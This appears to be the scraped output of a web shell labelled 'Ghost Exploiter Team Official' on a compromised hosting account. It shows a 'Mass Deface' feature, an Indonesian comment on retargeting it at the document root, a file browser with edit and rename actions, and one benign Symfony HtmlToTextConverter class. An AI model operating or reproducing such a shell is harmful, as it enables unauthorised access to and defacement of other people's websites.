webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
symfony
/
mime
/
HtmlToTextConverter
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
DefaultHtmlToTextConver
...
0.575KB
edt
ren
HtmlToTextConverterInte
...
0.608KB
edt
ren
LeagueHtmlToMarkdownCon
...
0.873KB
edt
ren
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Mime\HtmlToTextConverter; /** * @author Fabien Potencier <fabien@symfony.com> */ class DefaultHtmlToTextConverter implements HtmlToTextConverterInterface { public function convert(string $html, string $charset): string { return strip_tags(preg_replace('{<(head|style)\b.*?</\1>}is', '', $html)); } }
<=Back
Liking